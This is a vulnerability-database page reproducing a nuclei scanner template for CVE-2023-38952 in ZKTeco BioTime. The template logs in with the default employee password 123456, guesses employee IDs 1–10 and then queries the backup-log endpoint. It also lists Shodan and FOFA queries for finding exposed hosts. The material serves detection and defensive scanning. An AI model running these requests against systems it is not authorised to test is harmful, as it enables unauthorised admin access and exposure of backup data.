Lucene search
K

ZKTeco BioTime <= 9.0.1 - Privilege Escalation

🗓️ 03 Jul 2026 13:39:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 30 Views

BioTime default password 123456 allows privilege escalation and access to admin actions and backup files.

Related
Refs
Code
id: CVE-2023-38952

info:
  name: ZKTeco BioTime <= 9.0.1 - Privilege Escalation
  author: riteshs4hu
  severity: high
  description: |
    BioTime default employee credentials (password 123456) allow login. Sessions are not role-validated, enabling privilege escalation to perform admin actions and enumerate backup files.
  impact: |
    Unauthenticated attackers can access sensitive files and credentials, leading to data breach and potential system compromise.
  remediation: |
    Implement proper authentication and access controls for static file resources, and update to the latest version if available.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-38951
    - https://krashconsulting.com/fury-of-fingers-biotime-rce/
    - https://github.com/omair2084/biotime-rce-8.5.5/blob/main/biotime_enum.py
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.3
    cve-id: CVE-2023-38952
    epss-score: 0.02438
    epss-percentile: 0.82295
    cwe-id: CWE-552
    cpe: cpe:2.3:a:zkteco:biotime:8.5.5:*:*:*:*:*:*:*
  metadata:
    verified: true
    vendor: zkteco
    product: biotime
    max-request: 12
    shodan-query: http.html:"ZKTeco Security"
    fofa-query: body="ZKTeco Security"
  tags: cve,cve2023,biotime,zkteco,auth-bypass,priv-esc,vkev

http:
  - raw:
      - |
        GET /login/ HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: regex
        name: csrf
        group: 1
        internal: true
        part: body
        regex:
          - "name='csrfmiddlewaretoken' value='([a-zA-Z0-9]+)'"

  - raw:
      - |
        POST /login/ HTTP/1.1
        Host: {{Hostname}}
        X-CSRFToken: {{csrf}}
        Content-Type: application/x-www-form-urlencoded

        username={{user}}&password=123456&captcha=&login_user=employee

    payloads:
      user:
        - "1"
        - "2"
        - "3"
        - "4"
        - "5"
        - "6"
        - "7"
        - "8"
        - "9"
        - "10"
    attack: clusterbomb
    stop-at-first-match: true

  - raw:
      - |
        GET /base/dbbackuplog/table/?page=1&limit=1 HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(body, "db_type\":", "backup_file\":")'
          - 'contains(content_type, "application/json")'
        condition: and
# digest: 4b0a00483046022100c7f15bbb5e7f06efc1235268b3d584d439b94cef200ace888a8e6d62ea78d5cd022100fc15707fd23c32c58d14729070cc90e3fed02c0f127ef4ca9e5f1dea0a324909:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation